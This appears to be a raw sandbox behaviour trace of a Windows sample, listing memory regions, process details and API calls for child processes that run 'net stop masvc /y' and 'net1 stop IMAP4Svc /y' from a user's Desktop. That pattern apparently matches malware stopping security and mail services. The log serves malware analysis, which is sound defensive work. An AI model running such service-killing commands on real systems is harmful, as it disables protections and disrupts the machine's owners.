entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5810 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5811 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5812 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5813 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5814 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 5815 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5816 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 533 os_tid = 0xfcc Process: id = "124" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x61a73000" os_pid = "0x1010" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop masvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5837 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5838 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5839 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5840 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5841 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5842 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5843 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5844 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5845 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5846 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5847 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5848 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5849 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5850 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5851 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5983 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5984 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5985 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5986 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5987 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5988 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5989 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5990 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5991 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5992 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5993 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5994 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5995 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5996 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5997 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5998 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5999 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6000 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6001 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6002 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 535 os_tid = 0xfec Process: id = "125" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x61b0b000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "122" os_parent_pid = "0xec0" cmd_line = "C:\\Windows\\system32\\net1 stop IMAP4Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5852 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5853 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5854 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5855 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5856 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5857 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5858 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5859 start_va = 0xffd80000 end_va = 0xffdb2fff entry_point = 0xffd80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5860 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5861 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5862 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5863 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5864 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5865 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5866 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5867 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5868 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5869 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5870 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 5871 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 5872 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5873 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5874 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5875 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5876 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5877 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5878 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5879 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5880 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5881 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5882 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5883 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5884 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5885 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5886 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5887 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5888 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5889 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5943 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 537 os_tid = 0xc8c [0097.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f9b0 | out: lpSystemTimeAsFileTime=0x22f9b0*(dwLowDateTime=0xef913ef0, dwHighDateTime=0x1d48689)) [0097.970] GetCurrentProcessId () returned 0xca8 [0097.970] GetCurrentThreadId () returned 0xc8c [0097.970] GetTickCount () returned 0x2249f [0097.970] QueryPerformanceCounter (in: lpPerformanceCount=0x22f9b8 | out: lpPerformanceCount=0x22f9b8*=1814488900000) returned 1 [0097.972] GetModuleHandleW (lpModuleName=0x0) returned 0xffd80000 [0097.972] __set_app_type (_Type=0x1) [0097.972] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd99c9c) returned 0x0 [0097.973] __getmainargs (in: _Argc=0xffda4780, _Argv=0xffda4790, _Env=0xffda4788, _DoWildCard=0, _StartInfo=0xffda479c | out: _Argc=0xffda4780, _Argv=0xffda4790, _Env=0xffda4788) returned 0 [0097.973] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.973] GetConsoleOutputCP () returned 0x1b5 [0098.033] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdacec0 | out: lpCPInfo=0xffdacec0) returned 1 [0098.033] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.035] sprintf_s (in: _DstBuf=0x22f958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0098.035] setlocale (category=0, locale=".437") returned="English_United States.437" [0098.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.037] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.037] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IMAP4Svc /y" [0098.037] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22f6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0098.037] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0098.037] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22f948 | out: Buffer=0x22f948*=0x2d4d40) returned 0x0 [0098.037] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22f948 | out: Buffer=0x22f948*=0x2dc0e0) returned 0x0 [0098.038] _fileno (_File=0x7fefdba2a80) returned 0 [0098.038] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0098.038] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0098.038] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0098.038] _wcsicmp (_String1="config", _String2="stop") returned -16 [0098.038] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0098.038] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0098.038] _wcsicmp (_String1="file", _String2="stop") returned -13 [0098.038] _wcsicmp (_String1="files", _String2="stop") returned -13 [0098.038] _wcsicmp (_String1="group", _String2="stop") returned -12 [0098.038] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0098.038] _wcsicmp (_String1="help", _String2="stop") returned -11 [0098.038] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0098.038] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0098.038] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0098.038] _wcsicmp (_String1="session", _String2="stop") returned -15 [0098.039] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0098.039] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0098.039] _wcsicmp (_String1="share", _String2="stop") returned -12 [0098.039] _wcsicmp (_String1="start", _String2="stop") returned -14 [0098.039] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0098.039] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0098.039] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0098.039] _wcsicmp (_String1="accounts", _String2="IMAP4Svc") returned -8 [0098.039] _wcsicmp (_String1="computer", _String2="IMAP4Svc") returned -6 [0098.039] _wcsicmp (_String1="config", _String2="IMAP4Svc") returned -6 [0098.039] _wcsicmp (_String1="continue", _String2="IMAP4Svc") returned -6 [0098.039] _wcsicmp (_String1="cont", _String2="IMAP4Svc") returned -6 [0098.039] _wcsicmp (_String1="file", _String2="IMAP4Svc") returned -3 [0098.039] _wcsicmp (_String1="files", _String2="IMAP4Svc") returned -3 [0098.039] _wcsicmp (_String1="group", _String2="IMAP4Svc") returned -2 [0098.039] _wcsicmp (_String1="groups", _String2="IMAP4Svc") returned -2 [0098.039] _wcsicmp (_String1="help", _String2="IMAP4Svc") returned -1 [0098.039] _wcsicmp (_String1="helpmsg", _String2="IMAP4Svc") returned -1 [0098.039] _wcsicmp (_String1="localgroup", _String2="IMAP4Svc") returned 3 [0098.040] _wcsicmp (_String1="pause", _String2="IMAP4Svc") returned 7 [0098.040] _wcsicmp (_String1="session", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="sessions", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="sess", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="share", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="start", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="stats", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="statistics", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="stop", _String2="IMAP4Svc") returned 10 [0098.040] _wcsicmp (_String1="time", _String2="IMAP4Svc") returned 11 [0098.040] _wcsicmp (_String1="user", _String2="IMAP4Svc") returned 12 [0098.040] _wcsicmp (_String1="users", _String2="IMAP4Svc") returned 12 [0098.040] _wcsicmp (_String1="msg", _String2="IMAP4Svc") returned 4 [0098.040] _wcsicmp (_String1="messenger", _String2="IMAP4Svc") returned 4 [0098.040] _wcsicmp (_String1="receiver", _String2="IMAP4Svc") returned 9 [0098.040] _wcsicmp (_String1="rcv", _String2="IMAP4Svc") returned 9 [0098.040] _wcsicmp (_String1="netpopup", _String2="IMAP4Svc") returned 5 [0098.040] _wcsicmp (_String1="redirector", _String2="IMAP4Svc") returned 9 [0098.040] _wcsicmp (_String1="redir", _String2="IMAP4Svc") returned 9 [0098.040] _wcsicmp (_String1="rdr", _String2="IMAP4Svc") returned 9 [0098.041] _wcsicmp (_String1="workstation", _String2="IMAP4Svc") returned 14 [0098.041] _wcsicmp (_String1="work", _String2="IMAP4Svc") returned 14 [0098.041] _wcsicmp (_String1="wksta", _String2="IMAP4Svc") returned 14 [0098.041] _wcsicmp (_String1="prdr", _String2="IMAP4Svc") returned 7 [0098.041] _wcsicmp (_String1="devrdr", _String2="IMAP4Svc") returned -5 [0098.041] _wcsicmp (_String1="lanmanworkstation", _String2="IMAP4Svc") returned 3 [0098.041] _wcsicmp (_String1="server", _String2="IMAP4Svc") returned 10 [0098.041] _wcsicmp (_String1="svr", _String2="IMAP4Svc") returned 10 [0098.041] _wcsicmp (_String1="srv", _String2="IMAP4Svc") returned 10 [0098.041] _wcsicmp (_String1="lanmanserver", _String2="IMAP4Svc") returned 3 [0098.041] _wcsicmp (_String1="alerter", _String2="IMAP4Svc") returned -8 [0098.041] _wcsicmp (_String1="netlogon", _String2="IMAP4Svc") returned 5 [0098.041] _wcsupr (in: _String="IMAP4Svc" | out: _String="IMAP4SVC") returned="IMAP4SVC" [0098.041] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2dcdf0 [0098.045] GetServiceKeyNameW (in: hSCManager=0x2dcdf0, lpDisplayName="IMAP4SVC", lpServiceName=0xffda5750, lpcchBuffer=0x22f868 | out: lpServiceName="", lpcchBuffer=0x22f868) returned 0 [0098.046] _wcsicmp (_String1="msg", _String2="IMAP4SVC") returned 4 [0098.046] _wcsicmp (_String1="messenger", _String2="IMAP4SVC") returned 4 [0098.046] _wcsicmp (_String1="receiver", _String2="IMAP4SVC") returned 9 [0098.046] _wcsicmp (_String1="rcv", _String2="IMAP4SVC") returned 9 [0098.046] _wcsicmp (_String1="redirector", _String2="IMAP4SVC") returned 9 [0098.046] _wcsicmp (_String1="redir", _String2="IMAP4SVC") returned 9 [0098.046] _wcsicmp (_String1="rdr", _String2="IMAP4SVC") returned 9 [0098.046] _wcsicmp (_String1="workstation", _String2="IMAP4SVC") returned 14 [0098.046] _wcsicmp (_String1="work", _String2="IMAP4SVC") returned 14 [0098.046] _wcsicmp (_String1="wksta", _String2="IMAP4SVC") returned 14 [0098.046] _wcsicmp (_String1="prdr", _String2="IMAP4SVC") returned 7 [0098.046] _wcsicmp (_String1="devrdr", _String2="IMAP4SVC") returned -5 [0098.046] _wcsicmp (_String1="lanmanworkstation", _String2="IMAP4SVC") returned 3 [0098.046] _wcsicmp (_String1="server", _String2="IMAP4SVC") returned 10 [0098.046] _wcsicmp (_String1="svr", _String2="IMAP4SVC") returned 10 [0098.046] _wcsicmp (_String1="srv", _String2="IMAP4SVC") returned 10 [0098.046] _wcsicmp (_String1="lanmanserver", _String2="IMAP4SVC") returned 3 [0098.046] _wcsicmp (_String1="alerter", _String2="IMAP4SVC") returned -8 [0098.046] _wcsicmp (_String1="netlogon", _String2="IMAP4SVC") returned 5 [0098.046] NetServiceControl (in: servername=0x0, service="IMAP4SVC", opcode=0x0, arg=0x0, bufptr=0x22f870 | out: bufptr=0x22f870) returned 0x889 [0098.047] wcscpy_s (in: _Destination=0xffda80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0098.047] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0098.048] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffda5b50, nSize=0x800, Arguments=0xffda7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0098.049] GetFileType (hFile=0xb) returned 0x2 [0098.050] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f738 | out: lpMode=0x22f738) returned 1 [0098.050] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x22f730, lpReserved=0x0 | out: lpBuffer=0xffda5b50*, lpNumberOfCharsWritten=0x22f730*=0x1e) returned 1 [0098.050] GetFileType (hFile=0xb) returned 0x2 [0098.050] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f738 | out: lpMode=0x22f738) returned 1 [0098.051] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f730, lpReserved=0x0 | out: lpBuffer=0xffd81efc*, lpNumberOfCharsWritten=0x22f730*=0x2) returned 1 [0098.051] _ultow (in: _Dest=0x889, _Radix=2291616 | out: _Dest=0x889) returned="2185" [0098.051] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffda5b50, nSize=0x800, Arguments=0xffda7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0098.051] GetFileType (hFile=0xb) returned 0x2 [0098.051] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f738 | out: lpMode=0x22f738) returned 1 [0098.052] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x22f730, lpReserved=0x0 | out: lpBuffer=0xffda5b50*, lpNumberOfCharsWritten=0x22f730*=0x34) returned 1 [0098.052] GetFileType (hFile=0xb) returned 0x2 [0098.052] GetConsoleMode (in: hConsoleHandle=0xb, 